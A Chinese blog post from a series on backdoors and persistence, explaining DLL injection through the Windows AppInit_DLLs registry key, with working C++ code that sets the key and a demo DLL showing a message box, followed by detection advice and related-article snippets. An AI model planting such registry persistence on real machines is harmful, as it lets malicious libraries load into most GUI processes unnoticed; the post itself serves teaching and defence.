后门及持久化访问3----进程注入之AppInit_DLLs注册表项

最新推荐文章于 2024-04-23 09:55:42 发布
最新推荐文章于 2024-04-23 09:55:42 发布
阅读量799 收藏 2
点赞数
分类专栏: # 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/107005590
版权

进程注入之AppInit_DLLs注册表项

User32.dll被加载到进程时,会获取AppInit_DLLs注册表项,若有值,则调用LoadLibrary() API加载用户DLL。只会影响加载了user32.dll的进程。

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls

代码如下:


#include 
#include 
using namespace std;

int test()
{
	HKEY hKey;
	DWORD dwDisposition;
	const char path[] = "C:\\dll.dll";
	DWORD dwData = 1;
	RegCreateKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, NULL, 0, KEY_WRITE, NULL, &hKey, &dwDisposition);
	RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (BYTE*)path, (1 + ::lstrlenA(path)));
	RegSetValueExA(hKey, "LoadAppInit_DLLs", 0, REG_DWORD, (BYTE*)& dwData, sizeof(DWORD));
	return 0;
}

int main()
{
	test();
	//system("pause");
	return 0;
}

复现过程

将以上代码编译为exe文件,放到测试机运行会产生一下注册项
修改过后如下图所示:

dll代码如下:


// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
	MessageBoxA(0, "hello qianxiao996", "AppCert", 0);
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

运行cmd.exe,就会发现cmd.exe已经加载指定dll,并弹框。

此注册表项下的每个库都会加载到每个加载User32.dll的进程中。User32.dll是一个非常常见的库,用于存储对话框等图形元素。恶意软件可以在Appinit_Dlls注册表项下插入其恶意库的位置,以使另一个进程加载其库。因此,当恶意软件修改此子键时,大多数进程将加载恶意库。

检查及清除方法

  • 监测加载User32.dll的进程的dll的加载,特别是查找不是通常的dll,或者不是正常加载的dll。
  • 监视AppInit_DLLs注册表值。
  • 监视和分析注册表编辑的API调用,如RegCreateKeyEx和RegSetValueEx。

 

浅笑⁹⁹⁶
关注
专栏目录
Avanguard-master_library_Anti-Intrusion_win32_
10-04
injection techinques (against of CreateRemoteThread manual modules mapping injection through APC and AppInit_DLLs context switching)* Memory protection (kernel callbacks remapping)* Anti-splicing ...
DLL注入——使用注册表
希望能帮助大家,希望大家多多支持,你们的支持是我前进的动力。
08-24 4365
整个系统的配置都保存在注册表中,我们可以通过调整其中的设置来改变系统的行为。该方式依赖User32.dll,也就是说,需要可执行程序调用到这个系统动态库,我们注入dll才会被执行到。基本上所有基于GUI的应用程序都使用了User32.dll。// AppInit_Dlls(64位程序读取)//AppInit_Dlls(32位程序读取)//32位系统查看注册表:windows+R键,输入regedit。
Windows Dll Injection、Process Injection、API Hook、DLL后门/恶意程序入侵技术
weixin_33869377的博客
02-02 1061
catalogue 1. 引言2. 使用注册表注入DLL3. 使用Windows挂钩来注入DLL4. 使用远程线程来注入DLL5. 使用木马DLL注入DLL6. 把DLL作为调试器来注入7. 使用createprocess来注入代码8. APC DLL注入9. API Hook拦截10. Detours - Inline Hook11. 以服务形式执行DLL中指定函数/或直接指定EXE作为启动...
常见系统后门技术总结与分析利用
m0_61869253的博客
08-09 946
在本文的很多例子中,其实都会或多或少与一个东西有关,那就是注册表。关于注册表,我觉得值得花时间去仔细研究一番,一定会有很大的收获。关于系统后门技术其实还有许许多多,本文只是将常见的一些技术拿出来进行了分享,希望可以对大家的学习有帮助。如有不对,欢迎指正。[外链图片转存中…(img-qhddTgV9-1691466893281)][外链图片转存中…(img-t4tuwy48-1691466893282)]
使用注册表Applint_DLLs的DLL注入
m0_68653650的博客
01-11 738
软件逆向工程课程,仅限用于课程学习,切记不要用于其他用途哦!
利用AppInit_Dlls注入在win10上的限制
weixin_33970449的博客
11-21 742
起因 AppInit_Dlls注入方法特别简便,日常注入测试首选,在win7上屡试不爽,具体原理如下: support.microsoft.com/en-us/help/… docs.microsoft.com/en-us/windo…windows-7-and-windows-server-2008-r2 但是最近使用win10系统之后发现,注入方法失效。在检查过所有的配置都正确之...
进程注入的研究与实现-上下
09-06
**原理**:在Windows NT/2000/XP/2003等操作系统中,存在一个特殊的注册表键值`HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs`。当某个进程加载User32.dll时,该键值中列...
Android代码-AppInit
08-06
可以在指定进程的指定线程,按指定顺序分发 Application 生命周期方法给初始化类(继承自 SimpleAppInit 并添加 AppInit 注解,低耦合) 可以配置各模块间的初始化顺序,模块内部自己管理各初始化类的顺序,也可配置...
anti-anti-vm-detection-dll
05-14
使用dll的方法是将其路径写入AppInit_DLLs注册表值,然后每个加载user32.dll进程也将加载我的dll。 还有2个黑名单文件:registry_blackList.txt,files_blackList.txt。 这些文件定义要隐藏的文件和注册表。 ...
AppInit_DLLs被劫持与解析
testalllife的专栏
03-02 6827
AppInit, DLLs, 解析AppInit_DLLs被劫持及kv*.dll木马群appinit_dlls是什么?appinit_dlls存在路径在windowsNT/cv/windows/APPInit_DLLs ,appinit_dlls是不是病毒呢?注册表的系统设置AppInit_DLLs”可以为任一个进程调用一个dll列表早期的进程插入式木马的伎俩,通过修改注册表中的[HKEY_L
DLL注入练习之注册表主表-AppInit_DLLs表
RickGray
06-04 6018
上一遍介绍了DLL远程注入的基本原理,在这篇文章中,就来看看另一个DLL注入的方法,注册表DLL注入。 其实注册表注入相对远程DLL注入来说更简单、更方便一点,只需在注册表中修改AppInit_DLLs和LoadAppInit_DLLs的键值即可。 (User32.dll被加载到进程时,会获取AppInit_DLLs注册表,若有值,则调用LoadLibrary() API加载用户DLL。所有
DLL注入Appinit_Dlls
swanabin的专栏
03-18 6182
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Microsoft is modifying the AppInit DLLs facility in Windows 7 and Windows Serv
每天记录学习的新知识:AppInit
嗯...
09-16 1309
AppInit:Android 应用初始化框架
后门持久化访问2----进程注入AppCertDlls 注册表
浅笑996的博客
07-01 1112
代码及原理介绍 如果有进程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec 函数,那么此进程会获取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls注册表,此下的dll都会加载到此进程。 Win7版本下没有“AppCertDlls”,需自己创建。 代码如下
想玩一个简单的注入??AppInit_DLLs注册表注入它来了
KOOKNUT的博客
06-29 1670
之前介绍过一些Ring3层的注入方式,但那些都是需要用代码来实现注入,实现起来相对来说比较复杂。如果有兄弟想试一下注入的快感,又不想写复杂的程序,那么不妨可以玩玩注册表注入方式。 不过这种注入方式有他的弊端,那就是注入的程序必须加载user32.dll,也就说通常是那些GUI程序才可以。原因是,每当启动一个GUI程序,他都会扫描注册表AppInit_DLLs,看看其中有没有制定的目标库,如果有,那就在程序运行时,首先主动加载该动态库,所以我们只需要将Dll完整路径写在这个位置,就可完成注入。值得一提的
apps_init
星空探索
03-17 417
apps_init   /* one time setup */ void apps_init(void) {     const struct app_descriptor *app;    /* call all the init routines */     for (app = &__apps_start; app != &__apps_end; app++) {
特殊注册表键值"AppInit_Dlls"
weixin_33695450的博客
11-20 344
正常情况下它的值应该是空的。 这个目表示每当一个程序启动的时候,appinit_dlls中的dll文件就会注入到该程序里面去启动。 举个例子:如果appinit_dlls=qhbpri.dll,那么在登录windows后,系统加载了explorer.exe,那么qhbpri.dll也会出现在其中。 如果被篡改,请按以下步骤操作: 1、打开注册表: 开始——运行——键入:REG...
AppInit:一站式应用初始化服务,让开发更高效
最新发布
gitblog_00012的博客
04-23 366
AppInit:一站式应用初始化服务,让开发更高效 去发现同类优质开源目:https://gitcode.com/ 是一个强大的开源目,旨在简化应用程序开发的初始阶段,通过提供预配置的模板和自动化流程,帮助开发者快速启动新目。无论是移动应用、Web 应用还是后台服务,AppInit 都能为你节省大量时间和精力。 技术分析 AppInit 基于现代 Web 技术构建,采用了流行的前端框架 Vu...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值